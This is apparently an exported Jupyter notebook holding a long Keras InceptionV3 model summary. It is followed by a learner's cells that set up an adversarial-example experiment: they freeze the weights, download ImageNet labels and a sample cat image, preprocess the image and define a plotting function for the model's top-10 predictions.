\n__________________________________________________________________________________________________\nbatch_normalization_35 (BatchNo (None, 17, 17, 128) 384 conv2d_35[0][0] \n__________________________________________________________________________________________________\nactivation_35 (Activation) (None, 17, 17, 128) 0 batch_normalization_35[0][0] \n__________________________________________________________________________________________________\nconv2d_31 (Conv2D) (None, 17, 17, 128) 98304 mixed3[0][0] \n__________________________________________________________________________________________________\nconv2d_36 (Conv2D) (None, 17, 17, 128) 114688 activation_35[0][0] 
\n__________________________________________________________________________________________________\nbatch_normalization_31 (BatchNo (None, 17, 17, 128) 384 conv2d_31[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_36 (BatchNo (None, 17, 17, 128) 384 conv2d_36[0][0] \n__________________________________________________________________________________________________\nactivation_31 (Activation) (None, 17, 17, 128) 0 batch_normalization_31[0][0] \n__________________________________________________________________________________________________\nactivation_36 (Activation) (None, 17, 17, 128) 0 batch_normalization_36[0][0] \n__________________________________________________________________________________________________\nconv2d_32 (Conv2D) (None, 17, 17, 128) 114688 activation_31[0][0] \n__________________________________________________________________________________________________\nconv2d_37 (Conv2D) (None, 17, 17, 128) 114688 activation_36[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_32 (BatchNo (None, 17, 17, 128) 384 conv2d_32[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_37 (BatchNo (None, 17, 17, 128) 384 conv2d_37[0][0] \n__________________________________________________________________________________________________\nactivation_32 (Activation) (None, 17, 17, 128) 0 batch_normalization_32[0][0] \n__________________________________________________________________________________________________\nactivation_37 (Activation) (None, 17, 17, 128) 0 batch_normalization_37[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_3 (AveragePoo (None, 17, 17, 768) 0 mixed3[0][0] 
\n__________________________________________________________________________________________________\nconv2d_30 (Conv2D) (None, 17, 17, 192) 147456 mixed3[0][0] \n__________________________________________________________________________________________________\nconv2d_33 (Conv2D) (None, 17, 17, 192) 172032 activation_32[0][0] \n__________________________________________________________________________________________________\nconv2d_38 (Conv2D) (None, 17, 17, 192) 172032 activation_37[0][0] \n__________________________________________________________________________________________________\nconv2d_39 (Conv2D) (None, 17, 17, 192) 147456 average_pooling2d_3[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_30 (BatchNo (None, 17, 17, 192) 576 conv2d_30[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_33 (BatchNo (None, 17, 17, 192) 576 conv2d_33[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_38 (BatchNo (None, 17, 17, 192) 576 conv2d_38[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_39 (BatchNo (None, 17, 17, 192) 576 conv2d_39[0][0] \n__________________________________________________________________________________________________\nactivation_30 (Activation) (None, 17, 17, 192) 0 batch_normalization_30[0][0] \n__________________________________________________________________________________________________\nactivation_33 (Activation) (None, 17, 17, 192) 0 batch_normalization_33[0][0] \n__________________________________________________________________________________________________\nactivation_38 (Activation) (None, 17, 17, 192) 0 batch_normalization_38[0][0] 
\n__________________________________________________________________________________________________\nactivation_39 (Activation) (None, 17, 17, 192) 0 batch_normalization_39[0][0] \n__________________________________________________________________________________________________\nmixed4 (Concatenate) (None, 17, 17, 768) 0 activation_30[0][0] \n activation_33[0][0] \n activation_38[0][0] \n activation_39[0][0] \n__________________________________________________________________________________________________\nconv2d_44 (Conv2D) (None, 17, 17, 160) 122880 mixed4[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_44 (BatchNo (None, 17, 17, 160) 480 conv2d_44[0][0] \n__________________________________________________________________________________________________\nactivation_44 (Activation) (None, 17, 17, 160) 0 batch_normalization_44[0][0] \n__________________________________________________________________________________________________\nconv2d_45 (Conv2D) (None, 17, 17, 160) 179200 activation_44[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_45 (BatchNo (None, 17, 17, 160) 480 conv2d_45[0][0] \n__________________________________________________________________________________________________\nactivation_45 (Activation) (None, 17, 17, 160) 0 batch_normalization_45[0][0] \n__________________________________________________________________________________________________\nconv2d_41 (Conv2D) (None, 17, 17, 160) 122880 mixed4[0][0] \n__________________________________________________________________________________________________\nconv2d_46 (Conv2D) (None, 17, 17, 160) 179200 activation_45[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_41 (BatchNo (None, 17, 17, 160) 480 conv2d_41[0][0] 
\n__________________________________________________________________________________________________\nbatch_normalization_46 (BatchNo (None, 17, 17, 160) 480 conv2d_46[0][0] \n__________________________________________________________________________________________________\nactivation_41 (Activation) (None, 17, 17, 160) 0 batch_normalization_41[0][0] \n__________________________________________________________________________________________________\nactivation_46 (Activation) (None, 17, 17, 160) 0 batch_normalization_46[0][0] \n__________________________________________________________________________________________________\nconv2d_42 (Conv2D) (None, 17, 17, 160) 179200 activation_41[0][0] \n__________________________________________________________________________________________________\nconv2d_47 (Conv2D) (None, 17, 17, 160) 179200 activation_46[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_42 (BatchNo (None, 17, 17, 160) 480 conv2d_42[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_47 (BatchNo (None, 17, 17, 160) 480 conv2d_47[0][0] \n__________________________________________________________________________________________________\nactivation_42 (Activation) (None, 17, 17, 160) 0 batch_normalization_42[0][0] \n__________________________________________________________________________________________________\nactivation_47 (Activation) (None, 17, 17, 160) 0 batch_normalization_47[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_4 (AveragePoo (None, 17, 17, 768) 0 mixed4[0][0] \n__________________________________________________________________________________________________\nconv2d_40 (Conv2D) (None, 17, 17, 192) 147456 mixed4[0][0] 
\n__________________________________________________________________________________________________\nconv2d_43 (Conv2D) (None, 17, 17, 192) 215040 activation_42[0][0] \n__________________________________________________________________________________________________\nconv2d_48 (Conv2D) (None, 17, 17, 192) 215040 activation_47[0][0] \n__________________________________________________________________________________________________\nconv2d_49 (Conv2D) (None, 17, 17, 192) 147456 average_pooling2d_4[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_40 (BatchNo (None, 17, 17, 192) 576 conv2d_40[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_43 (BatchNo (None, 17, 17, 192) 576 conv2d_43[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_48 (BatchNo (None, 17, 17, 192) 576 conv2d_48[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_49 (BatchNo (None, 17, 17, 192) 576 conv2d_49[0][0] \n__________________________________________________________________________________________________\nactivation_40 (Activation) (None, 17, 17, 192) 0 batch_normalization_40[0][0] \n__________________________________________________________________________________________________\nactivation_43 (Activation) (None, 17, 17, 192) 0 batch_normalization_43[0][0] \n__________________________________________________________________________________________________\nactivation_48 (Activation) (None, 17, 17, 192) 0 batch_normalization_48[0][0] \n__________________________________________________________________________________________________\nactivation_49 (Activation) (None, 17, 17, 192) 0 batch_normalization_49[0][0] 
\n__________________________________________________________________________________________________\nmixed5 (Concatenate) (None, 17, 17, 768) 0 activation_40[0][0] \n activation_43[0][0] \n activation_48[0][0] \n activation_49[0][0] \n__________________________________________________________________________________________________\nconv2d_54 (Conv2D) (None, 17, 17, 160) 122880 mixed5[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_54 (BatchNo (None, 17, 17, 160) 480 conv2d_54[0][0] \n__________________________________________________________________________________________________\nactivation_54 (Activation) (None, 17, 17, 160) 0 batch_normalization_54[0][0] \n__________________________________________________________________________________________________\nconv2d_55 (Conv2D) (None, 17, 17, 160) 179200 activation_54[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_55 (BatchNo (None, 17, 17, 160) 480 conv2d_55[0][0] \n__________________________________________________________________________________________________\nactivation_55 (Activation) (None, 17, 17, 160) 0 batch_normalization_55[0][0] \n__________________________________________________________________________________________________\nconv2d_51 (Conv2D) (None, 17, 17, 160) 122880 mixed5[0][0] \n__________________________________________________________________________________________________\nconv2d_56 (Conv2D) (None, 17, 17, 160) 179200 activation_55[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_51 (BatchNo (None, 17, 17, 160) 480 conv2d_51[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_56 (BatchNo (None, 17, 17, 160) 480 conv2d_56[0][0] 
\n__________________________________________________________________________________________________\nactivation_51 (Activation) (None, 17, 17, 160) 0 batch_normalization_51[0][0] \n__________________________________________________________________________________________________\nactivation_56 (Activation) (None, 17, 17, 160) 0 batch_normalization_56[0][0] \n__________________________________________________________________________________________________\nconv2d_52 (Conv2D) (None, 17, 17, 160) 179200 activation_51[0][0] \n__________________________________________________________________________________________________\nconv2d_57 (Conv2D) (None, 17, 17, 160) 179200 activation_56[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_52 (BatchNo (None, 17, 17, 160) 480 conv2d_52[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_57 (BatchNo (None, 17, 17, 160) 480 conv2d_57[0][0] \n__________________________________________________________________________________________________\nactivation_52 (Activation) (None, 17, 17, 160) 0 batch_normalization_52[0][0] \n__________________________________________________________________________________________________\nactivation_57 (Activation) (None, 17, 17, 160) 0 batch_normalization_57[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_5 (AveragePoo (None, 17, 17, 768) 0 mixed5[0][0] \n__________________________________________________________________________________________________\nconv2d_50 (Conv2D) (None, 17, 17, 192) 147456 mixed5[0][0] \n__________________________________________________________________________________________________\nconv2d_53 (Conv2D) (None, 17, 17, 192) 215040 activation_52[0][0] 
\n__________________________________________________________________________________________________\nconv2d_58 (Conv2D) (None, 17, 17, 192) 215040 activation_57[0][0] \n__________________________________________________________________________________________________\nconv2d_59 (Conv2D) (None, 17, 17, 192) 147456 average_pooling2d_5[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_50 (BatchNo (None, 17, 17, 192) 576 conv2d_50[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_53 (BatchNo (None, 17, 17, 192) 576 conv2d_53[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_58 (BatchNo (None, 17, 17, 192) 576 conv2d_58[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_59 (BatchNo (None, 17, 17, 192) 576 conv2d_59[0][0] \n__________________________________________________________________________________________________\nactivation_50 (Activation) (None, 17, 17, 192) 0 batch_normalization_50[0][0] \n__________________________________________________________________________________________________\nactivation_53 (Activation) (None, 17, 17, 192) 0 batch_normalization_53[0][0] \n__________________________________________________________________________________________________\nactivation_58 (Activation) (None, 17, 17, 192) 0 batch_normalization_58[0][0] \n__________________________________________________________________________________________________\nactivation_59 (Activation) (None, 17, 17, 192) 0 batch_normalization_59[0][0] \n__________________________________________________________________________________________________\nmixed6 (Concatenate) (None, 17, 17, 768) 0 activation_50[0][0] \n activation_53[0][0] \n activation_58[0][0] \n activation_59[0][0] 
\n__________________________________________________________________________________________________\nconv2d_64 (Conv2D) (None, 17, 17, 192) 147456 mixed6[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_64 (BatchNo (None, 17, 17, 192) 576 conv2d_64[0][0] \n__________________________________________________________________________________________________\nactivation_64 (Activation) (None, 17, 17, 192) 0 batch_normalization_64[0][0] \n__________________________________________________________________________________________________\nconv2d_65 (Conv2D) (None, 17, 17, 192) 258048 activation_64[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_65 (BatchNo (None, 17, 17, 192) 576 conv2d_65[0][0] \n__________________________________________________________________________________________________\nactivation_65 (Activation) (None, 17, 17, 192) 0 batch_normalization_65[0][0] \n__________________________________________________________________________________________________\nconv2d_61 (Conv2D) (None, 17, 17, 192) 147456 mixed6[0][0] \n__________________________________________________________________________________________________\nconv2d_66 (Conv2D) (None, 17, 17, 192) 258048 activation_65[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_61 (BatchNo (None, 17, 17, 192) 576 conv2d_61[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_66 (BatchNo (None, 17, 17, 192) 576 conv2d_66[0][0] \n__________________________________________________________________________________________________\nactivation_61 (Activation) (None, 17, 17, 192) 0 batch_normalization_61[0][0] 
\n__________________________________________________________________________________________________\nactivation_66 (Activation) (None, 17, 17, 192) 0 batch_normalization_66[0][0] \n__________________________________________________________________________________________________\nconv2d_62 (Conv2D) (None, 17, 17, 192) 258048 activation_61[0][0] \n__________________________________________________________________________________________________\nconv2d_67 (Conv2D) (None, 17, 17, 192) 258048 activation_66[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_62 (BatchNo (None, 17, 17, 192) 576 conv2d_62[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_67 (BatchNo (None, 17, 17, 192) 576 conv2d_67[0][0] \n__________________________________________________________________________________________________\nactivation_62 (Activation) (None, 17, 17, 192) 0 batch_normalization_62[0][0] \n__________________________________________________________________________________________________\nactivation_67 (Activation) (None, 17, 17, 192) 0 batch_normalization_67[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_6 (AveragePoo (None, 17, 17, 768) 0 mixed6[0][0] \n__________________________________________________________________________________________________\nconv2d_60 (Conv2D) (None, 17, 17, 192) 147456 mixed6[0][0] \n__________________________________________________________________________________________________\nconv2d_63 (Conv2D) (None, 17, 17, 192) 258048 activation_62[0][0] \n__________________________________________________________________________________________________\nconv2d_68 (Conv2D) (None, 17, 17, 192) 258048 activation_67[0][0] 
\n__________________________________________________________________________________________________\nconv2d_69 (Conv2D) (None, 17, 17, 192) 147456 average_pooling2d_6[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_60 (BatchNo (None, 17, 17, 192) 576 conv2d_60[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_63 (BatchNo (None, 17, 17, 192) 576 conv2d_63[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_68 (BatchNo (None, 17, 17, 192) 576 conv2d_68[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_69 (BatchNo (None, 17, 17, 192) 576 conv2d_69[0][0] \n__________________________________________________________________________________________________\nactivation_60 (Activation) (None, 17, 17, 192) 0 batch_normalization_60[0][0] \n__________________________________________________________________________________________________\nactivation_63 (Activation) (None, 17, 17, 192) 0 batch_normalization_63[0][0] \n__________________________________________________________________________________________________\nactivation_68 (Activation) (None, 17, 17, 192) 0 batch_normalization_68[0][0] \n__________________________________________________________________________________________________\nactivation_69 (Activation) (None, 17, 17, 192) 0 batch_normalization_69[0][0] \n__________________________________________________________________________________________________\nmixed7 (Concatenate) (None, 17, 17, 768) 0 activation_60[0][0] \n activation_63[0][0] \n activation_68[0][0] \n activation_69[0][0] \n__________________________________________________________________________________________________\nconv2d_72 (Conv2D) (None, 17, 17, 192) 147456 mixed7[0][0] 
\n__________________________________________________________________________________________________\nbatch_normalization_72 (BatchNo (None, 17, 17, 192) 576 conv2d_72[0][0] \n__________________________________________________________________________________________________\nactivation_72 (Activation) (None, 17, 17, 192) 0 batch_normalization_72[0][0] \n__________________________________________________________________________________________________\nconv2d_73 (Conv2D) (None, 17, 17, 192) 258048 activation_72[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_73 (BatchNo (None, 17, 17, 192) 576 conv2d_73[0][0] \n__________________________________________________________________________________________________\nactivation_73 (Activation) (None, 17, 17, 192) 0 batch_normalization_73[0][0] \n__________________________________________________________________________________________________\nconv2d_70 (Conv2D) (None, 17, 17, 192) 147456 mixed7[0][0] \n__________________________________________________________________________________________________\nconv2d_74 (Conv2D) (None, 17, 17, 192) 258048 activation_73[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_70 (BatchNo (None, 17, 17, 192) 576 conv2d_70[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_74 (BatchNo (None, 17, 17, 192) 576 conv2d_74[0][0] \n__________________________________________________________________________________________________\nactivation_70 (Activation) (None, 17, 17, 192) 0 batch_normalization_70[0][0] \n__________________________________________________________________________________________________\nactivation_74 (Activation) (None, 17, 17, 192) 0 batch_normalization_74[0][0] 
\n__________________________________________________________________________________________________\nconv2d_71 (Conv2D) (None, 8, 8, 320) 552960 activation_70[0][0] \n__________________________________________________________________________________________________\nconv2d_75 (Conv2D) (None, 8, 8, 192) 331776 activation_74[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_71 (BatchNo (None, 8, 8, 320) 960 conv2d_71[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_75 (BatchNo (None, 8, 8, 192) 576 conv2d_75[0][0] \n__________________________________________________________________________________________________\nactivation_71 (Activation) (None, 8, 8, 320) 0 batch_normalization_71[0][0] \n__________________________________________________________________________________________________\nactivation_75 (Activation) (None, 8, 8, 192) 0 batch_normalization_75[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_3 (MaxPooling2D) (None, 8, 8, 768) 0 mixed7[0][0] \n__________________________________________________________________________________________________\nmixed8 (Concatenate) (None, 8, 8, 1280) 0 activation_71[0][0] \n activation_75[0][0] \n max_pooling2d_3[0][0] \n__________________________________________________________________________________________________\nconv2d_80 (Conv2D) (None, 8, 8, 448) 573440 mixed8[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_80 (BatchNo (None, 8, 8, 448) 1344 conv2d_80[0][0] \n__________________________________________________________________________________________________\nactivation_80 (Activation) (None, 8, 8, 448) 0 batch_normalization_80[0][0] 
\n__________________________________________________________________________________________________\nconv2d_77 (Conv2D) (None, 8, 8, 384) 491520 mixed8[0][0] \n__________________________________________________________________________________________________\nconv2d_81 (Conv2D) (None, 8, 8, 384) 1548288 activation_80[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_77 (BatchNo (None, 8, 8, 384) 1152 conv2d_77[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_81 (BatchNo (None, 8, 8, 384) 1152 conv2d_81[0][0] \n__________________________________________________________________________________________________\nactivation_77 (Activation) (None, 8, 8, 384) 0 batch_normalization_77[0][0] \n__________________________________________________________________________________________________\nactivation_81 (Activation) (None, 8, 8, 384) 0 batch_normalization_81[0][0] \n__________________________________________________________________________________________________\nconv2d_78 (Conv2D) (None, 8, 8, 384) 442368 activation_77[0][0] \n__________________________________________________________________________________________________\nconv2d_79 (Conv2D) (None, 8, 8, 384) 442368 activation_77[0][0] \n__________________________________________________________________________________________________\nconv2d_82 (Conv2D) (None, 8, 8, 384) 442368 activation_81[0][0] \n__________________________________________________________________________________________________\nconv2d_83 (Conv2D) (None, 8, 8, 384) 442368 activation_81[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_7 (AveragePoo (None, 8, 8, 1280) 0 mixed8[0][0] \n__________________________________________________________________________________________________\nconv2d_76 (Conv2D) (None, 8, 8, 320) 
409600 mixed8[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_78 (BatchNo (None, 8, 8, 384) 1152 conv2d_78[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_79 (BatchNo (None, 8, 8, 384) 1152 conv2d_79[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_82 (BatchNo (None, 8, 8, 384) 1152 conv2d_82[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_83 (BatchNo (None, 8, 8, 384) 1152 conv2d_83[0][0] \n__________________________________________________________________________________________________\nconv2d_84 (Conv2D) (None, 8, 8, 192) 245760 average_pooling2d_7[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_76 (BatchNo (None, 8, 8, 320) 960 conv2d_76[0][0] \n__________________________________________________________________________________________________\nactivation_78 (Activation) (None, 8, 8, 384) 0 batch_normalization_78[0][0] \n__________________________________________________________________________________________________\nactivation_79 (Activation) (None, 8, 8, 384) 0 batch_normalization_79[0][0] \n__________________________________________________________________________________________________\nactivation_82 (Activation) (None, 8, 8, 384) 0 batch_normalization_82[0][0] \n__________________________________________________________________________________________________\nactivation_83 (Activation) (None, 8, 8, 384) 0 batch_normalization_83[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_84 (BatchNo (None, 8, 8, 192) 576 conv2d_84[0][0] 
\n__________________________________________________________________________________________________\nactivation_76 (Activation) (None, 8, 8, 320) 0 batch_normalization_76[0][0] \n__________________________________________________________________________________________________\nmixed9_0 (Concatenate) (None, 8, 8, 768) 0 activation_78[0][0] \n activation_79[0][0] \n__________________________________________________________________________________________________\nconcatenate (Concatenate) (None, 8, 8, 768) 0 activation_82[0][0] \n activation_83[0][0] \n__________________________________________________________________________________________________\nactivation_84 (Activation) (None, 8, 8, 192) 0 batch_normalization_84[0][0] \n__________________________________________________________________________________________________\nmixed9 (Concatenate) (None, 8, 8, 2048) 0 activation_76[0][0] \n mixed9_0[0][0] \n concatenate[0][0] \n activation_84[0][0] \n__________________________________________________________________________________________________\nconv2d_89 (Conv2D) (None, 8, 8, 448) 917504 mixed9[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_89 (BatchNo (None, 8, 8, 448) 1344 conv2d_89[0][0] \n__________________________________________________________________________________________________\nactivation_89 (Activation) (None, 8, 8, 448) 0 batch_normalization_89[0][0] \n__________________________________________________________________________________________________\nconv2d_86 (Conv2D) (None, 8, 8, 384) 786432 mixed9[0][0] \n__________________________________________________________________________________________________\nconv2d_90 (Conv2D) (None, 8, 8, 384) 1548288 activation_89[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_86 (BatchNo (None, 8, 8, 384) 1152 conv2d_86[0][0] 
\n__________________________________________________________________________________________________\nbatch_normalization_90 (BatchNo (None, 8, 8, 384) 1152 conv2d_90[0][0] \n__________________________________________________________________________________________________\nactivation_86 (Activation) (None, 8, 8, 384) 0 batch_normalization_86[0][0] \n__________________________________________________________________________________________________\nactivation_90 (Activation) (None, 8, 8, 384) 0 batch_normalization_90[0][0] \n__________________________________________________________________________________________________\nconv2d_87 (Conv2D) (None, 8, 8, 384) 442368 activation_86[0][0] \n__________________________________________________________________________________________________\nconv2d_88 (Conv2D) (None, 8, 8, 384) 442368 activation_86[0][0] \n__________________________________________________________________________________________________\nconv2d_91 (Conv2D) (None, 8, 8, 384) 442368 activation_90[0][0] \n__________________________________________________________________________________________________\nconv2d_92 (Conv2D) (None, 8, 8, 384) 442368 activation_90[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_8 (AveragePoo (None, 8, 8, 2048) 0 mixed9[0][0] \n__________________________________________________________________________________________________\nconv2d_85 (Conv2D) (None, 8, 8, 320) 655360 mixed9[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_87 (BatchNo (None, 8, 8, 384) 1152 conv2d_87[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_88 (BatchNo (None, 8, 8, 384) 1152 conv2d_88[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_91 (BatchNo 
(None, 8, 8, 384) 1152 conv2d_91[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_92 (BatchNo (None, 8, 8, 384) 1152 conv2d_92[0][0] \n__________________________________________________________________________________________________\nconv2d_93 (Conv2D) (None, 8, 8, 192) 393216 average_pooling2d_8[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_85 (BatchNo (None, 8, 8, 320) 960 conv2d_85[0][0] \n__________________________________________________________________________________________________\nactivation_87 (Activation) (None, 8, 8, 384) 0 batch_normalization_87[0][0] \n__________________________________________________________________________________________________\nactivation_88 (Activation) (None, 8, 8, 384) 0 batch_normalization_88[0][0] \n__________________________________________________________________________________________________\nactivation_91 (Activation) (None, 8, 8, 384) 0 batch_normalization_91[0][0] \n__________________________________________________________________________________________________\nactivation_92 (Activation) (None, 8, 8, 384) 0 batch_normalization_92[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_93 (BatchNo (None, 8, 8, 192) 576 conv2d_93[0][0] \n__________________________________________________________________________________________________\nactivation_85 (Activation) (None, 8, 8, 320) 0 batch_normalization_85[0][0] \n__________________________________________________________________________________________________\nmixed9_1 (Concatenate) (None, 8, 8, 768) 0 activation_87[0][0] \n activation_88[0][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 8, 8, 768) 0 activation_91[0][0] \n activation_92[0][0] 
\n__________________________________________________________________________________________________\nactivation_93 (Activation) (None, 8, 8, 192) 0 batch_normalization_93[0][0] \n__________________________________________________________________________________________________\nmixed10 (Concatenate) (None, 8, 8, 2048) 0 activation_85[0][0] \n mixed9_1[0][0] \n concatenate_1[0][0] \n activation_93[0][0] \n__________________________________________________________________________________________________\navg_pool (GlobalAveragePooling2 (None, 2048) 0 mixed10[0][0] \n__________________________________________________________________________________________________\npredictions (Dense) (None, 1000) 2049000 avg_pool[0][0] \n==================================================================================================\n" ] ], [ [ "We need to find a way to make the weigths of `inception_model` constant, instead of `tf.Variable`, otherwise, we cannot train for an adversarial attack.", "_____no_output_____" ] ], [ [ "def non_dunder(obj, strict=False):\n if strict:\n prefix = \"_\"\n else:\n prefix = \"__\"\n return [s for s in dir(obj) if not s.startswith(prefix)]", "_____no_output_____" ], [ "non_dunder(inception_model, True)", "_____no_output_____" ] ], [ [ "help(inception_model.stop_training)", "_____no_output_____" ] ], [ [ "inception_model.trainable", "_____no_output_____" ], [ "inception_model.trainable = False\ninception_model.trainable", "_____no_output_____" ], [ "inception_model.trainable_weights, inception_model.trainable_variables", "_____no_output_____" ], [ "inception_model.layers", "_____no_output_____" ], [ "inception_model.layers[0].input.shape", "_____no_output_____" ], [ "image = tf.Variable(tf.zeros((1, 299, 299, 3)))", "_____no_output_____" ] ], [ [ "adversarial_model = keras.Model(\n inputs=image,\n outputs=inception_model(image),\n)", "_____no_output_____" ], [ "ValueError: Input tensors to a Functional must come from `tf.keras.Input`. 
Received: <tf.Variable 'Variable:0'>", "_____no_output_____" ] ], [ [ "How should we solve this question?", "_____no_output_____" ], [ "Note that although we cannot make a model using `tf.Variable` as input,\nwe can make `image` input of `inception_model`.", "_____no_output_____" ] ], [ [ "inception_model(image)", "_____no_output_____" ], [ "import json\nfrom pathlib import Path\nfrom urllib.request import urlretrieve", "_____no_output_____" ], [ "imagenet_json = Path(\"imagenet.json\")\nif not imagenet_json.exists():\n imagenet_json, _ = urlretrieve(\n 'https://www.anishathalye.com/media/2017/07/25/imagenet.json'\n )\n\nwith open(imagenet_json) as f:\n imagenet_labels = json.load(f)\nimagenet_labels", "_____no_output_____" ], [ "len(imagenet_labels)", "_____no_output_____" ] ], [ [ "## Example image\n\nWe load our example image and make sure it's classified correctly.", "_____no_output_____" ] ], [ [ "import numpy as np\nimport PIL", "_____no_output_____" ], [ "img_path = Path(\"cat.jpg\")\nif not img_path.exists():\n img_path, _ = urlretrieve('https://www.anishathalye.com/media/2017/07/25/cat.jpg')\nimg_class = 281\nimagenet_labels[img_class]", "_____no_output_____" ], [ "img = PIL.Image.open(img_path)\nbig_dim = max(img.width, img.height)\nwide = img.width > img.height\nnew_w = 299 if not wide else int(img.width * 299 / img.height)\nnew_h = 299 if wide else int(img.height * 299 / img.width)\nimg = img.resize((new_w, new_h)).crop((0, 0, 299, 299))\nimg = (np.asarray(img) / 255.0).astype(np.float32)\nimg.shape", "_____no_output_____" ], [ "np.random.rand(7)[[1,3,5]]", "_____no_output_____" ] ], [ [ "list(range(7))[[1,3,5]]", "_____no_output_____" ], [ "TypeError: list indices must be integers or slices, not list", "_____no_output_____" ] ], [ [ "It seems that `tf.Tensor`, like `list`, cannot access its subarray in this manner.", "_____no_output_____" ] ], [ [ "p = inception_model(np.expand_dims(img, axis=0))[0]\np.shape", "_____no_output_____" ] ], [ [ 
"p[[1,3,4]]", "_____no_output_____" ], [ "InvalidArgumentError: Index out of range using input dim 1; input has only 1 dims [Op:StridedSlice] name: strided_slice/", "_____no_output_____" ] ], [ [ "p.numpy()[[1,3,4]]", "_____no_output_____" ], [ "def classify(img, correct_class=None, target_class=None):\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 8))\n fig.sca(ax1) # sca() Select Current Axis\n p = inception_model(np.expand_dims(img, axis=0))[0]\n p = p.numpy()\n print(f\"type(p) = {type(p)}, len(p) = {len(p)}\")\n ax1.imshow(img)\n #fig.sca(ax1) # Why should there be two fig.sca(ax1)?\n \n # display the top 10 prediceted classes\n #topk = list(p.argsort()[-10:][::-1])\n #topk = list(tf.argsort(p)[-10:][::-1])\n topk = list((tf.argsort(p)[-10:][::-1]).numpy())\n print(f\"topk = {topk}\")\n topprobs = p[topk]\n barlist = ax2.bar(range(10), topprobs)\n if target_class in topk:\n barlist[topk.index(target_class)].set_color('r')\n if correct_class in topk:\n barlist[topk.index(correct_class)].set_color('g')\n plt.sca(ax2)\n plt.ylim([0, 1.1])\n plt.xticks(range(10),\n [imagenet_labels[i][:15] for i in topk],\n rotation='vertical')\n # :15 means \"taking the first 15 characters\" for fear of long-string class.\n fig.subplots_adjust(bottom=0.2)\n plt.show()", "_____no_output_____" ] ], [ [ "help(np.expand_dims)", "_____no_output_____" ] ], [ [ "**(?)** What is the `new_w, new_h, resize()` all about?<br>\n**(R)** The story was that Anish wanted to `crop((0,0,299,299))`, i.e. crop the `299x299` subimage for the upper left corner for each image. But the reality is that _**not every image has both width and height larger than**_ `299`. So the `resize((new_w, new_h))` was there to guarantee this. 
